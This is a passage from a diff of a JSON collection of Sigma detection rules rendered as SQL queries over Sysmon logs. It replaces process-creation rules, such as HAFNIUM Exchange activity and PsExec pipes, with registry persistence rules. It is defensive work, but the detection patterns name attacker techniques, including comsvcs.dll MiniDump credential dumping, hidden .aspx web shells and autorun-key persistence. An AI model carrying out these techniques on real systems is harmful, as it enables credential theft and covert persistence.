ESCAPE '\\' OR TargetObject LIKE '%eppiocemhmnlbhjplcgkofciiegomcon%' ESCAPE '\\' OR TargetObject LIKE '%cocfojppfigjeefejbpfmedgjbpchcng%' ESCAPE '\\' OR TargetObject LIKE '%foiopecknacmiihiocgdjgbjokkpkohc%' ESCAPE '\\' OR TargetObject LIKE '%hhdobjgopfphlmjbmnpglhfcgppchgje%' ESCAPE '\\' OR TargetObject LIKE '%jgbaghohigdbgbolncodkdlpenhcmcge%' ESCAPE '\\' OR TargetObject LIKE '%inligpkjkhbpifecbdjhmdpcfhnlelja%' ESCAPE '\\' OR TargetObject LIKE 
'%higioemojdadgdbhbbbkfbebbdlfjbip%' ESCAPE '\\' OR TargetObject LIKE '%hipncndjamdcmphkgngojegjblibadbe%' ESCAPE '\\' OR TargetObject LIKE '%iolonopooapdagdemdoaihahlfkncfgg%' ESCAPE '\\' OR TargetObject LIKE '%nhfjkakglbnnpkpldhjmpmmfefifedcj%' ESCAPE '\\' OR TargetObject LIKE '%jpgljfpmoofbmlieejglhonfofmahini%' ESCAPE '\\' OR TargetObject LIKE '%fgddmllnllkalaagkghckoinaemmogpe%' ESCAPE '\\' OR TargetObject LIKE '%ejkaocphofnobjdedneohbbiilggdlbi%' ESCAPE '\\' OR TargetObject LIKE '%keodbianoliadkoelloecbhllnpiocoi%' ESCAPE '\\' OR TargetObject LIKE '%hoapmlpnmpaehilehggglehfdlnoegck%' ESCAPE '\\' OR TargetObject LIKE '%poeojclicodamonabcabmapamjkkmnnk%' ESCAPE '\\' OR TargetObject LIKE '%dfkdflfgjdajbhocmfjolpjbebdkcjog%' ESCAPE '\\' OR TargetObject LIKE '%kcdahmgmaagjhocpipbodaokikjkampi%' ESCAPE '\\' OR TargetObject LIKE '%klnkiajpmpkkkgpgbogmcgfjhdoljacg%' ESCAPE '\\' OR TargetObject LIKE '%lneaocagcijjdpkcabeanfpdbmapcjjg%' ESCAPE '\\' OR TargetObject LIKE '%pgfpignfckbloagkfnamnolkeaecfgfh%' ESCAPE '\\' OR TargetObject LIKE '%jplnlifepflhkbkgonidnobkakhmpnmh%' ESCAPE '\\' OR TargetObject LIKE '%jliodmnojccaloajphkingdnpljdhdok%' ESCAPE '\\' OR TargetObject LIKE '%hnmpcagpplmpfojmgmnngilcnanddlhb%' ESCAPE '\\' OR TargetObject LIKE '%ffbkglfijbcbgblgflchnbphjdllaogb%' ESCAPE '\\' OR TargetObject LIKE '%kcndmbbelllkmioekdagahekgimemejo%' ESCAPE '\\' OR TargetObject LIKE '%jdgilggpfmjpbodmhndmhojklgfdlhob%' ESCAPE '\\' OR TargetObject LIKE '%bihhflimonbpcfagfadcnbbdngpopnjb%' ESCAPE '\\' OR TargetObject LIKE '%ppajinakbfocjfnijggfndbdmjggcmde%' ESCAPE '\\' OR TargetObject LIKE '%oofgbpoabipfcfjapgnbbjjaenockbdp%' ESCAPE '\\' OR TargetObject LIKE '%bhnhkdgoefpmekcgnccpnhjfdgicfebm%' ESCAPE '\\' OR TargetObject LIKE '%knmmpciebaoojcpjjoeonlcjacjopcpf%' ESCAPE '\\' OR TargetObject LIKE '%dhadilbmmjiooceioladdphemaliiobo%' ESCAPE '\\' OR TargetObject LIKE '%jedieiamjmoflcknjdjhpieklepfglin%' ESCAPE '\\' OR TargetObject LIKE '%mhngpdlhojliikfknhfaglpnddniijfh%' 
ESCAPE '\\' OR TargetObject LIKE '%omdakjcmkglenbhjadbccaookpfjihpa%' ESCAPE '\\' OR TargetObject LIKE '%npgimkapccfidfkfoklhpkgmhgfejhbj%' ESCAPE '\\' OR TargetObject LIKE '%akeehkgglkmpapdnanoochpfmeghfdln%' ESCAPE '\\' OR TargetObject LIKE '%gbmdmipapolaohpinhblmcnpmmlgfgje%' ESCAPE '\\' OR TargetObject LIKE '%aigmfoeogfnljhnofglledbhhfegannp%' ESCAPE '\\' OR TargetObject LIKE '%cgojmfochfikphincbhokimmmjenhhgk%' ESCAPE '\\' OR TargetObject LIKE '%ficajfeojakddincjafebjmfiefcmanc%' ESCAPE '\\' OR TargetObject LIKE '%ifnaibldjfdmaipaddffmgcmekjhiloa%' ESCAPE '\\' OR TargetObject LIKE '%jbnmpdkcfkochpanomnkhnafobppmccn%' ESCAPE '\\' OR TargetObject LIKE '%apcfdffemoinopelidncddjbhkiblecc%' ESCAPE '\\' OR TargetObject LIKE '%mjolnodfokkkaichkcjipfgblbfgojpa%' ESCAPE '\\' OR TargetObject LIKE '%oifjbnnafapeiknapihcmpeodaeblbkn%' ESCAPE '\\' OR TargetObject LIKE '%plpmggfglncceinmilojdkiijhmajkjh%' ESCAPE '\\' OR TargetObject LIKE '%mjnbclmflcpookeapghfhapeffmpodij%' ESCAPE '\\' OR TargetObject LIKE '%bblcccknbdbplgmdjnnikffefhdlobhp%' ESCAPE '\\' OR TargetObject LIKE '%aojlhgbkmkahabcmcpifbolnoichfeep%' ESCAPE '\\' OR TargetObject LIKE '%lcmammnjlbmlbcaniggmlejfjpjagiia%' ESCAPE '\\' OR TargetObject LIKE '%knajdeaocbpmfghhmijicidfcmdgbdpm%' ESCAPE '\\' OR TargetObject LIKE '%bdlcnpceagnkjnjlbbbcepohejbheilk%' ESCAPE '\\' OR TargetObject LIKE '%edknjdjielmpdlnllkdmaghlbpnmjmgb%' ESCAPE '\\' OR TargetObject LIKE '%eidnihaadmmancegllknfbliaijfmkgo%' ESCAPE '\\' OR TargetObject LIKE '%ckiahbcmlmkpfiijecbpflfahoimklke%' ESCAPE '\\' OR TargetObject LIKE '%macdlemfnignjhclfcfichcdhiomgjjb%' ESCAPE '\\' OR TargetObject LIKE '%chioafkonnhbpajpengbalkececleldf%' ESCAPE '\\' OR TargetObject LIKE '%amnoibeflfphhplmckdbiajkjaoomgnj%' ESCAPE '\\' OR TargetObject LIKE '%llbhddikeonkpbhpncnhialfbpnilcnc%' ESCAPE '\\' OR TargetObject LIKE '%pcienlhnoficegnepejpfiklggkioccm%' ESCAPE '\\' OR TargetObject LIKE '%iocnglnmfkgfedpcemdflhkchokkfeii%' ESCAPE '\\' OR TargetObject LIKE 
'%igahhbkcppaollcjeaaoapkijbnphfhb%' ESCAPE '\\' OR TargetObject LIKE '%njpmifchgidinihmijhcfpbdmglecdlb%' ESCAPE '\\' OR TargetObject LIKE '%ggackgngljinccllcmbgnpgpllcjepgc%' ESCAPE '\\' OR TargetObject LIKE '%kchocjcihdgkoplngjemhpplmmloanja%' ESCAPE '\\' OR TargetObject LIKE '%bnijmipndnicefcdbhgcjoognndbgkep%' ESCAPE '\\' OR TargetObject LIKE '%lklekjodgannjcccdlbicoamibgbdnmi%' ESCAPE '\\' OR TargetObject LIKE '%dbdbnchagbkhknegmhgikkleoogjcfge%' ESCAPE '\\' OR TargetObject LIKE '%egblhcjfjmbjajhjhpmnlekffgaemgfh%' ESCAPE '\\' OR TargetObject LIKE '%ehbhfpfdkmhcpaehaooegfdflljcnfec%' ESCAPE '\\' OR TargetObject LIKE '%bkkgdjpomdnfemhhkalfkogckjdkcjkg%' ESCAPE '\\' OR TargetObject LIKE '%almalgbpmcfpdaopimbdchdliminoign%' ESCAPE '\\' OR TargetObject LIKE '%akkbkhnikoeojlhiiomohpdnkhbkhieh%' ESCAPE '\\' OR TargetObject LIKE '%gbfgfbopcfokdpkdigfmoeaajfmpkbnh%' ESCAPE '\\' OR TargetObject LIKE '%bniikohfmajhdcffljgfeiklcbgffppl%' ESCAPE '\\' OR TargetObject LIKE '%lejgfmmlngaigdmmikblappdafcmkndb%' ESCAPE '\\' OR TargetObject LIKE '%ffhhkmlgedgcliajaedapkdfigdobcif%' ESCAPE '\\' OR TargetObject LIKE '%gcknhkkoolaabfmlnjonogaaifnjlfnp%' ESCAPE '\\' OR TargetObject LIKE '%pooljnboifbodgifngpppfklhifechoe%' ESCAPE '\\' OR TargetObject LIKE '%fjoaledfpmneenckfbpdfhkmimnjocfa%' ESCAPE '\\' OR TargetObject LIKE '%aakchaleigkohafkfjfjbblobjifikek%' ESCAPE '\\' OR TargetObject LIKE '%dpplabbmogkhghncfbfdeeokoefdjegm%' ESCAPE '\\' OR TargetObject LIKE '%padekgcemlokbadohgkifijomclgjgif%' ESCAPE '\\' OR TargetObject LIKE '%bfidboloedlamgdmenmlbipfnccokknp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_svchost_susp_parent_process.yml" + "filename": "registry_set_chrome_extension.yml" }, { - "title": "Renamed ZOHO Dctask64 Execution", - "id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", - "status": "test", - "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", - "author": 
"Florian Roth (Nextron Systems)", + "title": "CurrentVersion NT Autorun Keys Modification", + "id": "cbf93e5d-ca6c-4722-8bea-e9119007c248", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1055.001", - "attack.t1202", - "attack.t1218" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown yet" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Hashes LIKE '%6834B1B94E49701D77CCB3C0895E1AFD%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\dctask64.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\VmApplet%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Taskman%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GpExtensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AppSetup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AlternateShells\\\\AvailableShells%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\IconServiceLib%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Image File Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Font Drivers%' ESCAPE '\\' OR 
TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Load%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR (TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\DisableExceptionChainValidation' ESCAPE '\\' OR TargetObject LIKE '%\\\\MitigationOptions' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\ClickToRunStore\\\\HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\PreviousPolicyAreas%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\MaxNoGPOListChangesInterval%' ESCAPE '\\') AND Details IN ('DWORD (0x00000009)', 'DWORD (0x000003c0)')) OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%\\\\ngen.exe' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' AND TargetObject LIKE 
'%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Delete Cached Update Binary' ESCAPE '\\' AND Details LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe\"' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_dctask64.yml" + "filename": "registry_set_asep_reg_keys_modification_currentversion_nt.yml" }, { - "title": "HAFNIUM Exchange Exploitation Activity", - "id": "bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7", - "status": "test", - "description": "Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Persistence Via TypedPaths", + "id": "086ae989-9ca6-4fe7-895a-759c5544f247", + "status": "experimental", + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. 
Which might indicate persistence attempt", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546", - "attack.t1053" + "attack.persistence" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%attrib%' ESCAPE '\\' AND CommandLine LIKE '% +h %' ESCAPE '\\' AND CommandLine LIKE '% +s %' ESCAPE '\\' AND CommandLine LIKE '% +r %' ESCAPE '\\' AND CommandLine LIKE '%.aspx%' ESCAPE '\\') OR (Image LIKE '%\\\\ProgramData\\\\VSPerfMon\\\\%' ESCAPE '\\' OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%VSPerfMon%' ESCAPE '\\')) OR (Image LIKE '%Opera\\_browser.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\')) OR Image LIKE '%Users\\\\Public\\\\opera\\\\Opera\\_browser.exe' ESCAPE '\\' OR (CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%Temp\\\\\\_\\_output%' ESCAPE '\\') OR (Image LIKE '%\\\\makecab.exe' ESCAPE '\\' AND CommandLine LIKE '%inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dmp.zip%' ESCAPE '\\') OR (Image LIKE '%\\\\makecab.exe' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' OR CommandLine LIKE '%compressionmemory%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\')) OR (CommandLine LIKE '% -t7z %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Programdata\\\\pst%' ESCAPE '\\' AND CommandLine LIKE '%\\\\it.zip%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\comsvcs.dll%' ESCAPE '\\' AND CommandLine LIKE '%Minidump%' ESCAPE '\\' AND CommandLine LIKE '%full %' ESCAPE '\\' AND CommandLine LIKE '%\\\\inetpub\\\\wwwroot%' ESCAPE '\\') OR (CommandLine LIKE '%Windows\\\\Temp\\\\xx.bat%' ESCAPE '\\' OR CommandLine LIKE '%Windows\\\\WwanSvcdcs%' ESCAPE '\\' OR CommandLine LIKE 
'%Windows\\\\Temp\\\\cw.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\explorer.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_hafnium.yml" + "filename": "registry_set_persistence_typed_paths.yml" }, { - "title": "Suspicious JavaScript Execution Via Mshta.EXE", - "id": "67f113fa-e23d-4271-befa-30113b3e08b1", + "title": "Disable Microsoft Office Security Features", + "id": "7c637634-c95d-4bbf-b26c-a82510874b34", "status": "test", - "description": "Detects execution of javascript code using \"mshta.exe\".", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "description": "Disable Microsoft Office Security Features by registry", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.005" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND CommandLine LIKE '%javascript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%VBAWarnings' ESCAPE '\\' OR TargetObject LIKE '%DisableInternetFilesInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableUnsafeLocationsInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableAttachementsInPV' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_mshta_javascript.yml" + "filename": 
"registry_set_disable_microsoft_office_security_features.yml" }, { - "title": "Directory Removal Via Rmdir", - "id": "41ca393d-538c-408a-ac27-cf1e038be80c", + "title": "Add DisallowRun Execution to Registry", + "id": "275641a5-a492-45e2-a817-7c81e9d9d3e9", "status": "experimental", - "description": "Detects execution of the builtin \"rmdir\" command in order to delete directories.\nAdversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.\n", + "description": "Detect set DisallowRun to 1 to prevent user running specific computer program", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1070.004" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%rmdir%' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%/q%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\DisallowRun' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_cmd_rmdir_execution.yml" + "filename": "registry_set_disallowrun_execution.yml" }, { - "title": "PsExec Default Named Pipe", - "id": "f3f3a972-f982-40ad-b63c-bca6afdfad7c", - "status": "test", - "description": "Detects PsExec service installation and execution events (service and Sysmon)", - "author": "Thomas Patzke", + 
"title": "Modify User Shell Folders Startup Value", + "id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", + "status": "experimental", + "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.001" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' AND TargetObject LIKE '%Startup' ESCAPE '\\')" ], - "filename": "pipe_created_psexec_default_pipe.yml" + "filename": "registry_set_susp_user_shell_folders.yml" }, { - "title": "PsExec Pipes Artifacts", - "id": "9e77ed63-2ecf-4c7b-b09d-640834882028", - "status": "test", - "description": "Detecting use PsExec via Pipe Creation/Access to pipes", - "author": "Nikita Nazarov, oscd.community", + "title": "CurrentVersion Autorun Keys Modification", + "id": "20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.execution", - "attack.t1569.002" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate Administrator activity" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + 
"Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE 'psexec%' ESCAPE '\\' OR PipeName LIKE 'paexec%' ESCAPE '\\' OR PipeName LIKE 'remcom%' ESCAPE '\\' OR PipeName LIKE 'csexec%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\System\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Explorer\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logoff%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\PLAP Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Provider Filters%' ESCAPE '\\')) AND NOT 
((Details = '(Empty)' OR TargetObject LIKE '%\\\\NgcFirst\\\\ConsecutiveSwitchCount' ESCAPE '\\' OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\devicecensus.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\winsat.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\KeePass Password Safe 2\\\\ShInstUtil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Everything\\\\Everything.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\LogonUI.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{D6886603-9D2F-4EB2-B667-1971041FA96B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{BEC09223-B018-416D-A0AC-523971B639F5}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{8AF662BF-65A0-4D0A-A540-A338A999D36F}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe%' ESCAPE '\\')) OR (Image LIKE 
'C:\\\\Windows\\\\system32\\\\regsvr32.exe' ESCAPE '\\' AND TargetObject LIKE '%DropboxExt%' ESCAPE '\\' AND Details LIKE '%A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Opera Browser Assistant' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Opera\\\\assistant\\\\browser\\_assistant.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\iTunesHelper' ESCAPE '\\' AND Details LIKE '\"C:\\\\Program Files\\\\iTunes\\\\iTunesHelper.exe\"' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\zoommsirepair' ESCAPE '\\' AND Details LIKE '\"C:\\\\Program Files\\\\Zoom\\\\bin\\\\installer.exe\" /repair' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Greenshot' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Greenshot\\\\Greenshot.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\GoogleDriveFS' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\GoogleDriveFS.exe%' ESCAPE '\\') OR (TargetObject LIKE '%GoogleDrive%' ESCAPE '\\' AND Details IN ('{CFE8B367-77A7-41D7-9C90-75D16D7DC6B6}', '{A8E52322-8734-481D-A7E2-27B309EF8D56}', '{C973DA94-CBDF-4E77-81D1-E5B794FBD146}', '{51EF1569-67EE-4AD6-9646-E726C3FFC8A2}')) OR ((Details LIKE 